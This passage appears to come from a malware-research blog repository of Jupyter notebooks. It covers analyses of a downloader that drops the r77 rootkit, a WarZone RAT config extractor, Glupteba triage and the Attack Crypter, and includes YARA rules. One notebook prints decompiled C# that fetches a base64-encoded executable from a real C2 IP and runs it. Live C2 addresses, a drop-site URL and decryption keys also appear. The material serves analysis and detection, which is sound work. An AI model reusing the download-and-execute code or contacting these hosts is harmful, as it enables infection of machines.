45 | "metadata": {},
46 | "source": [
47 | "### C2 \n",
48 | "The URLs are base64 encoded and link back to the c2 server. In this case the url links to a .jpg file which is infact a base64 endcoded PE.\n",
49 | "\n",
50 | "```c#\n",
51 | "private static void StopRootkit()\n",
52 | "{\n",
53 | "\tWebClient webClient = new WebClient();\n",
54 | "\tStream stream = webClient.OpenRead(Encoding.UTF8.GetString(Convert.FromBase64String(\"aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc=\")));\n",
55 | "\tStreamReader streamReader = new StreamReader(stream);\n",
56 | "\tstring s = streamReader.ReadToEnd();\n",
57 | "\tbyte[] bytes = Convert.FromBase64String(s);\n",
58 | "\tFile.WriteAllBytes(Path.GetTempPath() + \"\\\\rkd.exe\", bytes);\n",
59 | "\tProcess.Start(Path.GetTempPath() + \"\\\\rkd.exe\");\n",
60 | "\tFile.Delete(Path.GetTempPath() + \"\\\\rkd.exe\");\n",
61 | "}\n",
62 | "```\n",
63 | "\n",
64 | "#### C2 URLs\n",
65 | "- `aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc=` -> `http://193.31.116.239/crypt/public/Update_Downloads/remove.jpg`\n",
66 | "- `aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3J0LmpwZw==` -> `http://193.31.116.239/crypt/public/Update_Downloads/rt.jpg`\n",
67 | "There are more... \n",
68 | "\n",
69 | "### Downloaded Modules\n",
70 | "\n",
71 | "#### remove.jpg \n",
72 | "\n",
73 | "Deletes the rootkit\n",
74 | "\n",
75 | "```c#\n",
76 | "public static void remove()\n",
77 | "{\n",
78 | "\ttry\n",
79 | "\t{\n",
80 | "\t\tbool[] array = new bool[2];\n",
81 | "\t\tarray[0] = true;\n",
82 | "\t\tforeach (bool flag in array)\n",
83 | "\t\t{\n",
84 | "\t\t\tusing (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, flag ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey(\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\", true))\n",
85 | "\t\t\t{\n",
86 | "\t\t\t\tbool flag2 = (registryKey.GetValue(\"AppInit_DLLs\", \"\") as string).Contains(\"r77-\");\n",
87 | "\t\t\t\tif (flag2)\n",
88 | "\t\t\t\t{\n",
89 | "\t\t\t\t\tregistryKey.SetValue(\"AppInit_DLLs\", \"\");\n",
90 | "\t\t\t\t}\n",
91 | "\t\t\t}\n",
92 | "\t\t}\n",
93 | "\t}\n",
94 | "\tcatch (Exception ex)\n",
95 | "\t{\n",
96 | "\t}\n",
97 | "}\n",
98 | "```\n",
99 | "#### rt.jpg\n",
100 | "This is a simple startup function for an open source userland rootkit that can be found on GitHub [r77-rootkit](https://github.com/bytecode77/r77-rootkit).\n",
101 | "\n",
102 | "## Server Misconfiguration\n",
103 | "It's almost like the developer knows they made some mistakes...\n",
104 | "\n",
105 | "\n",
106 | "### Laravel Debugger Exposed\n",
107 | "A typo in one of the C2 URLs exposed a server error with a full stack trace. This revealed that the developer was uing the [laravel](https://laravel.com/) PHP framework and had left the debugger publically exposed.\n",
108 | "\n",
109 | "\n",
110 | "### Open Directory\n",
111 | "The stack trace led to the discovery that the server root had been configured as an open directory with many files publicly served to the Internet including logs.\n",
112 | ""
113 | ]
114 | },
115 | {
116 | "cell_type": "markdown",
117 | "id": "76aa2654-5e1b-4b7e-9df0-c957da3c79e6",
118 | "metadata": {},
119 | "source": [
120 | "**Analysis Stopped:** \n",
121 | "\n",
122 | "There are more files and download links that could be investigated but the malware is so simple and the server configured so poorly we stopped our analysis. This malware looks more like a hobby project than a professional business..."
123 | ]
124 | },
125 | {
126 | "cell_type": "code",
127 | "execution_count": null,
128 | "id": "3d9e2ac2-f29f-4a28-b513-562c6508e2b6",
129 | "metadata": {},
130 | "outputs": [],
131 | "source": []
132 | }
133 | ],
134 | "metadata": {
135 | "kernelspec": {
136 | "display_name": "Python 3",
137 | "language": "python",
138 | "name": "python3"
139 | },
140 | "language_info": {
141 | "codemirror_mode": {
142 | "name": "ipython",
143 | "version": 3
144 | },
145 | "file_extension": ".py",
146 | "mimetype": "text/x-python",
147 | "name": "python",
148 | "nbconvert_exporter": "python",
149 | "pygments_lexer": "ipython3",
150 | "version": "3.9.5"
151 | }
152 | },
153 | "nbformat": 4,
154 | "nbformat_minor": 5
155 | }
156 |
--------------------------------------------------------------------------------
/_notebooks/2021-05-31-warzone_rat_config.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "593e8507-8d38-42f1-9449-60f1a89d4da0",
6 | "metadata": {},
7 | "source": [
8 | "# WarZone RAT \n",
9 | "> WarZone static config extractor\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [warzone,malware,config]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "7393edcb-38c6-4f02-a72d-98ce109502e5",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "The config is stored in the `.bss` PE section with the following format.\n",
24 | "\n",
25 | "Key length | key | data\n",
26 | "\n"
27 | ]
28 | },
29 | {
30 | "cell_type": "code",
31 | "execution_count": 25,
32 | "id": "be322404-96a4-46ab-b93f-1a3ab3722fa5",
33 | "metadata": {},
34 | "outputs": [],
35 | "source": [
36 | "# First lets setup our imports\n",
37 | "import argparse\n",
38 | "import struct\n",
39 | "import pefile\n",
40 | "import re\n",
41 | "import binascii"
42 | ]
43 | },
44 | {
45 | "cell_type": "markdown",
46 | "id": "8800c159-3130-400b-bc1f-00d7f11fe968",
47 | "metadata": {},
48 | "source": [
49 | "Now a quick reminder ddof binary data hex encoding for Python3"
50 | ]
51 | },
52 | {
53 | "cell_type": "markdown",
54 | "id": "581df870-90dc-4c2b-af87-66ace7987b1e",
55 | "metadata": {},
56 | "source": [
57 | "## RC4 Encryption\n",
58 | "The data is encrypted using RC4. For more information on RC4 check out our RC4 tutorial video.\n",
59 | "\n",
60 | "> youtube: https://youtu.be/CiJocXXMXK4"
61 | ]
62 | },
63 | {
64 | "cell_type": "code",
65 | "execution_count": 26,
66 | "id": "40e72184-8fb2-40e3-a84a-463379a48ade",
67 | "metadata": {
68 | "tags": []
69 | },
70 | "outputs": [],
71 | "source": [
72 | "# Now lets implement a simple RC4 decryption function\n",
73 | "def rc4crypt(data, key):\n",
74 | " #If the input is a string convert to byte arrays\n",
75 | " if type(data) == str:\n",
76 | " data = data.encode('utf-8')\n",
77 | " if type(key) == str:\n",
78 | " key = key.encode('utf-8')\n",
79 | " x = 0\n",
80 | " box = list(range(256))\n",
81 | " for i in range(256):\n",
82 | " x = (x + box[i] + key[i % len(key)]) % 256\n",
83 | " box[i], box[x] = box[x], box[i]\n",
84 | " x = 0\n",
85 | " y = 0\n",
86 | " out = []\n",
87 | " for c in data:\n",
88 | " x = (x + 1) % 256\n",
89 | " y = (y + box[x]) % 256\n",
90 | " box[x], box[y] = box[y], box[x]\n",
91 | " out.append(c ^ box[(box[x] + box[y]) % 256])\n",
92 | " return bytes(out)"
93 | ]
94 | },
95 | {
96 | "cell_type": "markdown",
97 | "id": "63c05d4d-b9f9-4fef-9e77-3ed85f19d043",
98 | "metadata": {},
99 | "source": [
100 | "## Helper functions"
101 | ]
102 | },
103 | {
104 | "cell_type": "code",
105 | "execution_count": 32,
106 | "id": "f0c2018f-45c2-4a57-8857-614bb601b71d",
107 | "metadata": {
108 | "tags": []
109 | },
110 | "outputs": [],
111 | "source": [
112 | "import binascii\n",
113 | "data = binascii.unhexlify(b'')\n",
114 | "key = binascii.unhexlify(b'')\n",
115 | "\n",
116 | "def unicode_strings(buf, n=4):\n",
117 | " import re\n",
118 | " ASCII_BYTE = b' !\\\"#\\$%&\\'\\(\\)\\*\\+,-\\./0123456789:;<=>\\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\[\\]\\^_`abcdefghijklmnopqrstuvwxyz\\{\\|\\}\\\\\\~\\t'\n",
119 | " if type(buf) == str:\n",
120 | " buf = buf.encode('utf-8')\n",
121 | " reg = b'((?:[%s]\\x00){%d,})' % (ASCII_BYTE, n)\n",
122 | " uni_re = re.compile(reg)\n",
123 | " out = []\n",
124 | " for match in uni_re.finditer(buf):\n",
125 | " try:\n",
126 | " out.append(match.group().decode(\"utf-16\"))\n",
127 | " except UnicodeDecodeError:\n",
128 | " continue\n",
129 | " return out\n",
130 | "\n",
131 | "def tohex(data):\n",
132 | " import binascii\n",
133 | " if type(data) == str:\n",
134 | " return binascii.hexlify(data.encode('utf-8'))\n",
135 | " else:\n",
136 | " return binascii.hexlify(data)"
137 | ]
138 | },
139 | {
140 | "cell_type": "code",
141 | "execution_count": 43,
142 | "id": "5043ce7a-5966-49eb-98a8-f2075c59acb4",
143 | "metadata": {},
144 | "outputs": [
145 | {
146 | "name": "stdout",
147 | "output_type": "stream",
148 | "text": [
149 | "host: 165.22.5.66, port: 1111\n"
150 | ]
151 | }
152 | ],
153 | "source": [
154 | "import pefile\n",
155 | "import struct\n",
156 | "\n",
157 | "warzone_file = b'/tmp/work/warzone.bin'\n",
158 | "data = open(warzone_file, 'rb').read()\n",
159 | "pe = pefile.PE(data=data)\n",
160 | "section_data = None\n",
161 | "for s in pe.sections:\n",
162 | " if s.Name == b'.bss\\x00\\x00\\x00\\x00':\n",
163 | " section_data = s.get_data()\n",
164 | "## size (DWORD) | key | data\n",
165 | "key_size = struct.unpack(' Investigating this elusive GO loader\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [Glubteba,loader,triage]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "0735d30c-0ccf-4d60-bc37-97643ef5095d",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Taking a look at some random GO malware with light obfuscation. Possibly linked to Glubteba.\n",
24 | "\n",
25 | "According to [Sophos](https://news.sophos.com/wp-content/uploads/2020/06/glupteba_final-1.pdf) there are 3 possible GO components linked to a Glupteba infection.\n",
26 | "\n",
27 | "- `payload64.dll` - a 64bit payload used along with the EternalBlue exploit to download the main Glupteba component\n",
28 | "- `payload32.dll` - a 32bit payload used along with the EternalBlue exploit to download the main Glupteba component\n",
29 | "- `collectchromefingerprint.exe` - a UPX packed binary used to locate Chrome and connect to `http[:]//swebgames[.]site/test.php?uuid=%s&browser=chrome` to register to browser-based fingerprinting services\n",
30 | "\n",
31 | "\n",
32 | "## References \n",
33 | "\n",
34 | "- [Glupteba: Hidden Malware Delivery in Plain Sight (pdf)](https://news.sophos.com/wp-content/uploads/2020/06/glupteba_final-1.pdf)\n",
35 | "- [Disrupting the Glupteba operation](https://blog.google/threat-analysis-group/disrupting-glupteba-operation/)\n",
36 | "- [Tracking Malicious Glupteba Activity Through the Blockchain](https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/)\n",
37 | "\n",
38 | "\n",
39 | "### Sample\n",
40 | "- [3cc7fb757318a924954642bfa36dda9c2cf53c9446a85bdcda756603e17a6961](https://www.unpac.me/results/8674879c-122d-4973-b45a-22a0f8217d95?hash=3cc7fb757318a924954642bfa36dda9c2cf53c9446a85bdcda756603e17a6961#/)\n",
41 | "- not glupteba but possibly similar obfuscator [dd124a7b396150e4d8275c473594e47ac24606ef0955e2c13310aac9045554ac](https://www.unpac.me/results/c2d49f20-7bd7-48af-b5f6-4ead73d3790f?hash=dd124a7b396150e4d8275c473594e47ac24606ef0955e2c13310aac9045554ac#/)"
42 | ]
43 | },
44 | {
45 | "cell_type": "markdown",
46 | "id": "dfab0373-0561-46d7-a238-d32e0d6e1966",
47 | "metadata": {},
48 | "source": [
49 | "## Analysis\n",
50 | "Looking through the Glupteba IOCs [released by Sophos](https://github.com/sophoslabs/IoCs/blob/master/Trojan-Glupteba) we can see two hashes labeled as `app.exe` which is the main component of Glupteba according to their report.\n",
51 | "\n",
52 | "- `407c70f0c1a1e34503dae74dd973cf037d607e3c4deb8f063d33f2142f1baf71` [UnpacMe](https://www.unpac.me/results/9754bb3a-2e48-4e8d-b3f0-b8d040bf7a43?hash=407c70f0c1a1e34503dae74dd973cf037d607e3c4deb8f063d33f2142f1baf71#/)\n",
53 | "- `83bbe9e7b7967ecbc493f8ea40947184c6c7346c6084431fceea0401a6279d29` [UnpacMe](https://www.unpac.me/results/d6e7585a-69e5-4946-9e22-f6846b9c1c13?hash=83bbe9e7b7967ecbc493f8ea40947184c6c7346c6084431fceea0401a6279d29#/)\n",
54 | "\n",
55 | "Upon analysis, both of these appear to be the 32-bit version of the payload delivered by the EternalBlue SMB exploit `payload32.dll`. One packed with UPX and the other not packed. This lead to some confusion as it is unclear in the report if this is considered the main Glubteba component. \n",
56 | "\n",
57 | "Comparing these samples with our sample `3cc7fb757318a924954642bfa36dda9c2cf53c9446a85bdcda756603e17a6961` we can see some overlap in functionality but our sample contains significantly more features including anti-analysis checks and a TOR browser and appears to better match with the full Glupteba functionally listed in the Sophos report. It is unclear if this module was part of the original Glupteba build analyzed by Sophos in 2020 or if it is a new build however it appears to now be the main Glupteba module. \n",
58 | "\n",
59 | "\n",
60 | "## Yara\n",
61 | "```c\n",
62 | "rule glub_hunt {\n",
63 | " strings:\n",
64 | "\n",
65 | " $report1 = \"main.reportInstallFailure\"\n",
66 | " $report2 = \"main.sendLog\"\n",
67 | " $report3 = \"main.sendLogError\"\n",
68 | " \n",
69 | " $anti1 = \"main.isRunningInsideVirtualBox\"\n",
70 | " $anti2 = \"main.isRunningInsideVMWare\"\n",
71 | " $anti3 = \"main.isRunningInsideParallels\"\n",
72 | " $anti4 = \"main.isRunningInsideVirtualPC\"\n",
73 | " $anti5 = \"main.isRunningInsideXen\"\n",
74 | " $anti6 = \"main.isRunningInsideAnyRun\"\n",
75 | " $anti7 = \"main.isRunningInsideVM\"\n",
76 | " \n",
77 | " $smb1 = \"main.handleConnSMB\"\n",
78 | " $smb2 = \"main.handleConnSMB.func1\"\n",
79 | " $smb3 = \"main.listenAndServeSMB\"\n",
80 | " $smb4 = \"main.listenAndServeSMB.func2\"\n",
81 | " $smb5 = \"main.listenAndServeSMB.func1\"\n",
82 | " $smb6 = \"main.watchSMB\"\n",
83 | " \n",
84 | " $tor1 = \"main.watchTor\"\n",
85 | " $tor2 = \"main.watchTor.func1\"\n",
86 | " $tor3 = \"main.watchTor.func2\"\n",
87 | " \n",
88 | " $drv1 = \"main.createDevice\"\n",
89 | " $drv2 = \"main.excludeFilename\"\n",
90 | " $drv3 = \"main.excludeFilename.func1\"\n",
91 | " $drv4 = \"main.disablePatchGuard\"\n",
92 | " $drv5 = \"main.disablePatchGuard.func1\"\n",
93 | "\n",
94 | " condition:\n",
95 | " filesize > 7MB and\n",
96 | " filesize < 10MB and\n",
97 | " 5 of them\n",
98 | "}\n",
99 | "```"
100 | ]
101 | },
102 | {
103 | "cell_type": "code",
104 | "execution_count": null,
105 | "id": "222157ef-1ec3-482f-bbdc-b738494266a8",
106 | "metadata": {},
107 | "outputs": [],
108 | "source": []
109 | }
110 | ],
111 | "metadata": {
112 | "kernelspec": {
113 | "display_name": "Python 3",
114 | "language": "python",
115 | "name": "python3"
116 | },
117 | "language_info": {
118 | "codemirror_mode": {
119 | "name": "ipython",
120 | "version": 3
121 | },
122 | "file_extension": ".py",
123 | "mimetype": "text/x-python",
124 | "name": "python",
125 | "nbconvert_exporter": "python",
126 | "pygments_lexer": "ipython3",
127 | "version": "3.9.5"
128 | }
129 | },
130 | "nbformat": 4,
131 | "nbformat_minor": 5
132 | }
133 |
--------------------------------------------------------------------------------
/_notebooks/2023-08-27-attack-crypter.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "7697c16f-5071-476c-8c65-b6eb2a5cf1d4",
6 | "metadata": {},
7 | "source": [
8 | "# Attack Crypter\n",
9 | "> An open source travesty used to drop .NET stealers\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [attack crypter,downloader,dotnet,open source]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "45ff0fc5-ab9a-4f26-b968-c4899141d965",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "AttackCrypt is an open source \"crypter\" project that can be used to \"protect\" binaries and \"prevent\" detection by AV. In the words of the developer...\n",
23 | "> I don t know how much This will stay FUD but will be updating it always and adding New Injection and new Attacks to it\n",
24 | "\n",
25 | "This crypter has recently been used to \"protect\" VenomRAT and is actively in use in the wild.\n",
26 | "\n",
27 | "GitHub: [Theattacker-Crypter](https://github.com/TheNewAttacker64/Theattacker-Crypter)\n",
28 | "\n",
29 | "\n",
30 | "\n",
31 | "## Sample\n",
32 | "[11c38fc24bf7b29cd6e974670bc11d7f92af124d8b7edcd89482500f4de3d442](https://www.unpac.me/results/99994980-a37e-4c4e-bc23-4e62da9461fb/#/)\n",
33 | "\n",
34 | "## References \n",
35 | "- [Attacker-Crypter (v0.9): Unveiling a Powerful Tool for Evading Antivirus and Enhancing Malware Capabilities](https://www.cyfirma.com/outofband/attacker-crypter-v0-9-unveiling-a-powerful-tool-for-evading-antivirus-and-enhancing-malware-capabilities/)\n",
36 | "\n"
37 | ]
38 | },
39 | {
40 | "cell_type": "markdown",
41 | "id": "f680921f-2a3d-4d78-98d7-b9ac251d6eba",
42 | "metadata": {},
43 | "source": [
44 | "## Analysis\n",
45 | "\n",
46 | "The crypter uses a generated mutex to ensure only one version of the payload is installed, but this mutex is not random it is prepended with the string `attackercrypter` lol!\n",
47 | "\n",
48 | "The crypter also claims to have anti-vm checks which are optional... these are simply a *manufactor* check via WMI `Select * from Win32_ComputerSystem`.\n",
49 | "\n",
50 | "```c#\n",
51 | "if ((manufacturer == \"microsoft corporation\" && item[\"Model\"].ToString().ToUpperInvariant().Contains(\"VIRTUAL\"))\n",
52 | " || manufacturer.Contains(\"vmware\")\n",
53 | " || item[\"Model\"].ToString() == \"VirtualBox\")\n",
54 | "```\n",
55 | "\n",
56 | "### Payload Decryption\n",
57 | "\n",
58 | "**Spoiler alert this is not really a cryptor lol!** Instead of protecting the payload the tool converts it into encrypted data that is stored as a string. This string must then be uploaded to a \"drop site\" but the operator and then the \"drop site\" URL placed in the tool to generate the \"stub\". This \"stub\" is not a stub it is actually just a downloader that will fetch the payload, decrypt it, and load it.\n",
59 | "\n",
60 | "This is the opposite of what you would like in a crypter as the loader will actually look the same for every \"build\". Let's check in on the VT detection rate in a week: [11c38fc24bf7b29cd6e974670bc11d7f92af124d8b7edcd89482500f4de3d442](https://www.virustotal.com/gui/file/11c38fc24bf7b29cd6e974670bc11d7f92af124d8b7edcd89482500f4de3d442).\n",
61 | "\n",
62 | "In this sample the drop site is `http[:]//paste.sensio[.]no/ReplicaSerena`\n",
63 | "\n",
64 | "An example of the \"encrypted\" data follows.\n",
65 | "\n",
66 | "```\n",
67 | "'Y','A','K','F','E','x','y','o','2','y','v','U','B','Z','N','C','q','R','j','O','l','Y'\n",
68 | "```\n",
69 | "\n",
70 | "#### Decryption\n",
71 | "\n",
72 | "[Cyber Chef link](https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'%5C''%7D,'',true,false,true,false)Find_/_Replace(%7B'option':'Simple%20string','string':','%7D,'',true,false,true,false)Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)AES_Decrypt(%7B'option':'Base64','string':'cT0j6Iw9VylE9o8lcfS4/Bcb8loeSeBirgvin5wpiwg%3D'%7D,%7B'option':'Base64','string':'0SRVQvZDd6l4hBTnn%2BE0TQ%3D%3D'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D))\n",
73 | "\n",
74 | "\n",
75 | "- Remove `,` and `'` from the string (deobfuscate)\n",
76 | "- Reverse the string\n",
77 | "- Base64 decode\n",
78 | "- Decrypt with hard coded key and IV (AES CBC)\n",
79 | " - The key and IV are base64 encoded \n",
80 | "\n",
81 | "In this sample the Key is `cT0j6Iw9VylE9o8lcfS4/Bcb8loeSeBirgvin5wpiwg=` and the IV is `0SRVQvZDd6l4hBTnn+E0TQ==`."
82 | ]
83 | },
84 | {
85 | "cell_type": "markdown",
86 | "id": "a89ca8a3-989e-4773-8225-a2d80f34bd82",
87 | "metadata": {},
88 | "source": [
89 | "## Yara Rule\n",
90 | "\n",
91 | "```c\n",
92 | "rule AttackCrypter {\n",
93 | " strings:\n",
94 | " \n",
95 | " $s1 = \"attackercrypter\" wide\n",
96 | " $s2 = \"$FOLDER\" wide\n",
97 | " $s3 = \"$FNAME.exe\" wide\n",
98 | " $s4 = \"$service\" wide\n",
99 | " $s5 = \"$serverpassword\" wide\n",
100 | " $s6 = \"$bottoken\" wide\n",
101 | " $s7 = \"$chatid\" wide\n",
102 | " $s8 = \"#NATIVEINJECTPATH\" wide\n",
103 | " $s9 = \"#DOTNETINJECTPATH\" wide\n",
104 | " $s10 = \"https://api.telegram.org/bot\" wide\n",
105 | " $s11 = \"Don t use on vm\" wide\n",
106 | " \n",
107 | " $m1 = \"FOKFILE\" ascii\n",
108 | " $m2 = \"FOKSTRING\" ascii\n",
109 | " $m3 = \"NIKBINARY32bit\" ascii\n",
110 | " $m4 = \"NIKFELSTART\" ascii\n",
111 | " \n",
112 | " condition:\n",
113 | " 5 of ($s*) and\n",
114 | " any of ($m*)\n",
115 | "}\n",
116 | "```\n"
117 | ]
118 | },
119 | {
120 | "cell_type": "code",
121 | "execution_count": null,
122 | "id": "838b0142-0bef-4cbc-b100-9a30b68e8d92",
123 | "metadata": {},
124 | "outputs": [],
125 | "source": []
126 | }
127 | ],
128 | "metadata": {
129 | "kernelspec": {
130 | "display_name": "Python 3",
131 | "language": "python",
132 | "name": "python3"
133 | },
134 | "language_info": {
135 | "codemirror_mode": {
136 | "name": "ipython",
137 | "version": 3
138 | },
139 | "file_extension": ".py",
140 | "mimetype": "text/x-python",
141 | "name": "python",
142 | "nbconvert_exporter": "python",
143 | "pygments_lexer": "ipython3",
144 | "version": "3.9.5"
145 | }
146 | },
147 | "nbformat": 4,
148 | "nbformat_minor": 5
149 | }
150 |
--------------------------------------------------------------------------------
/_notebooks/2021-06-27-python3_examples.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "8de89089-3acb-45c8-b245-d6dbb131c21a",
6 | "metadata": {},
7 | "source": [
8 | "# Python3 Tips and Sample Code\n",
9 | "> Some helpful code for binary manipulation with Python3\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [python,python3,tips,research]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "e77f323f-a482-487d-88a1-0dd523fb7319",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Python2.7 is like second nature to me now and I keep getting hung up on the idiotic typing that Python3 has introduced. Hopefully these examples will help."
24 | ]
25 | },
26 | {
27 | "cell_type": "markdown",
28 | "id": "65de0a09-f8ee-4c26-8924-6d1a818ef9c0",
29 | "metadata": {},
30 | "source": [
31 | "## Binary Data and Hex Ecoding"
32 | ]
33 | },
34 | {
35 | "cell_type": "code",
36 | "execution_count": 3,
37 | "id": "e28ae511-472c-43d0-a942-01abac575d09",
38 | "metadata": {},
39 | "outputs": [
40 | {
41 | "name": "stdout",
42 | "output_type": "stream",
43 | "text": [
44 | "b'test'\n",
45 | "test\n",
46 | "b'74657374'\n",
47 | "b'74657374'\n",
48 | "74657374\n",
49 | "b'test'\n",
50 | "b'test'\n",
51 | "test\n"
52 | ]
53 | }
54 | ],
55 | "source": [
56 | "import binascii\n",
57 | "\n",
58 | "string_example = \"test\"\n",
59 | "byte_array_example = b\"test\"\n",
60 | "\n",
61 | "# Convert string into bytes\n",
62 | "print(string_example.encode('utf-8'))\n",
63 | "\n",
64 | "# Convert byte array into string\n",
65 | "print(byte_array_example.decode('utf-8'))\n",
66 | "\n",
67 | "# Convert string into hex encoded byte array\n",
68 | "print(binascii.hexlify(string_example.encode('utf-8')))\n",
69 | "\n",
70 | "# Convert byte array into hex encoded byte array\n",
71 | "print(binascii.hexlify(byte_array_example))\n",
72 | "\n",
73 | "# Convert byte array into hex encoded string\n",
74 | "print(binascii.hexlify(byte_array_example).decode('utf-8'))\n",
75 | "\n",
76 | "# Convert hex encoded byte array into ascii byte array\n",
77 | "hex_byte_array = b'74657374'\n",
78 | "print(binascii.unhexlify(hex_byte_array))\n",
79 | "\n",
80 | "# Convert hex encoded string into ascii byte array\n",
81 | "hex_string = '74657374'\n",
82 | "print(binascii.unhexlify(hex_string.encode('utf-8')))\n",
83 | "\n",
84 | "# Convert hex encoded string into ascii string\n",
85 | "hex_string = '74657374'\n",
86 | "print(binascii.unhexlify(hex_string.encode('utf-8')).decode('utf-8'))"
87 | ]
88 | },
89 | {
90 | "cell_type": "markdown",
91 | "id": "1212dbd0-5329-4cc0-b239-c70be929715e",
92 | "metadata": {},
93 | "source": [
94 | "## Hex Encoding Helper Functions"
95 | ]
96 | },
97 | {
98 | "cell_type": "code",
99 | "execution_count": 4,
100 | "id": "85c49337-45fd-400c-b748-cf67f1204a28",
101 | "metadata": {},
102 | "outputs": [],
103 | "source": [
104 | "def unhex(hex_string):\n",
105 | " import binascii\n",
106 | " if type(hex_string) == str:\n",
107 | " return binascii.unhexlify(hex_string.encode('utf-8'))\n",
108 | " else:\n",
109 | " return binascii.unhexlify(hex_string)\n",
110 | "\n",
111 | "def tohex(data):\n",
112 | " import binascii\n",
113 | " if type(data) == str:\n",
114 | " return binascii.hexlify(data.encode('utf-8'))\n",
115 | " else:\n",
116 | " return binascii.hexlify(data)\n"
117 | ]
118 | },
119 | {
120 | "cell_type": "markdown",
121 | "id": "9c45b266-5d99-4eb9-bf90-fab386af5d4e",
122 | "metadata": {},
123 | "source": [
124 | "## Strings Functions"
125 | ]
126 | },
127 | {
128 | "cell_type": "code",
129 | "execution_count": 6,
130 | "id": "43d5649e-32d6-4763-b032-ff70a9f13c58",
131 | "metadata": {},
132 | "outputs": [],
133 | "source": [
134 | "def unicode_strings(buf, n=4):\n",
135 | " import re\n",
136 | " ASCII_BYTE = b' !\\\"#\\$%&\\'\\(\\)\\*\\+,-\\./0123456789:;<=>\\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\[\\]\\^_`abcdefghijklmnopqrstuvwxyz\\{\\|\\}\\\\\\~\\t'\n",
137 | " if type(buf) == str:\n",
138 | " buf = buf.encode('utf-8')\n",
139 | " reg = b'((?:[%s]\\x00){%d,})' % (ASCII_BYTE, n)\n",
140 | " uni_re = re.compile(reg)\n",
141 | " out = []\n",
142 | " for match in uni_re.finditer(buf):\n",
143 | " try:\n",
144 | " out.append(match.group().decode(\"utf-16\"))\n",
145 | " except UnicodeDecodeError:\n",
146 | " pass\n",
147 | " return out\n",
148 | "\n",
149 | "\n",
150 | "def ascii_strings(buf, n=4):\n",
151 | " import re\n",
152 | " ASCII_BYTE = b' !\\\"#\\$%&\\'\\(\\)\\*\\+,-\\./0123456789:;<=>\\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\[\\]\\^_`abcdefghijklmnopqrstuvwxyz\\{\\|\\}\\\\\\~\\t'\n",
153 | " if type(buf) == str:\n",
154 | " buf = buf.encode('utf-8')\n",
155 | " reg = b'([%s]{%d,})' % (ASCII_BYTE, n)\n",
156 | " ascii_re = re.compile(reg)\n",
157 | " out = []\n",
158 | " for match in ascii_re.finditer(buf):\n",
159 | " try:\n",
160 | " out.append(match.group().decode(\"ascii\"))\n",
161 | " except UnicodeDecodeError:\n",
162 | " pass\n",
163 | " return out"
164 | ]
165 | },
166 | {
167 | "cell_type": "code",
168 | "execution_count": 1,
169 | "id": "fce80936-c3f0-4e25-9182-785f8a64d6ad",
170 | "metadata": {},
171 | "outputs": [
172 | {
173 | "name": "stdout",
174 | "output_type": "stream",
175 | "text": [
176 | "test\n"
177 | ]
178 | }
179 | ],
180 | "source": [
181 | "test_var = \"test\"\n",
182 | "print(test_var)"
183 | ]
184 | },
185 | {
186 | "cell_type": "code",
187 | "execution_count": null,
188 | "id": "95aee5db-d17e-4fc0-9d40-ccd0859ec0ca",
189 | "metadata": {},
190 | "outputs": [],
191 | "source": []
192 | }
193 | ],
194 | "metadata": {
195 | "kernelspec": {
196 | "display_name": "Python 3",
197 | "language": "python",
198 | "name": "python3"
199 | },
200 | "language_info": {
201 | "codemirror_mode": {
202 | "name": "ipython",
203 | "version": 3
204 | },
205 | "file_extension": ".py",
206 | "mimetype": "text/x-python",
207 | "name": "python",
208 | "nbconvert_exporter": "python",
209 | "pygments_lexer": "ipython3",
210 | "version": "3.9.5"
211 | }
212 | },
213 | "nbformat": 4,
214 | "nbformat_minor": 5
215 | }
216 |
--------------------------------------------------------------------------------
/_sass/minima/fastpages-styles.scss:
--------------------------------------------------------------------------------
1 | //Default Overrides For Styles In Minima
2 | // If you wish to override any of this CSS, do so in _sass/minima/custom-styles.css
3 |
4 | .post img {
5 | display: block;
6 | // border:1px solid #021a40;
7 | vertical-align: top;
8 | margin-left: auto;
9 | margin-right: auto;
10 | }
11 |
12 | img.emoji{
13 | display: inline !important;
14 | vertical-align: baseline !important;
15 | }
16 |
17 | .post figcaption {
18 | text-align: center;
19 | font-size: .8rem;
20 | font-style: italic;
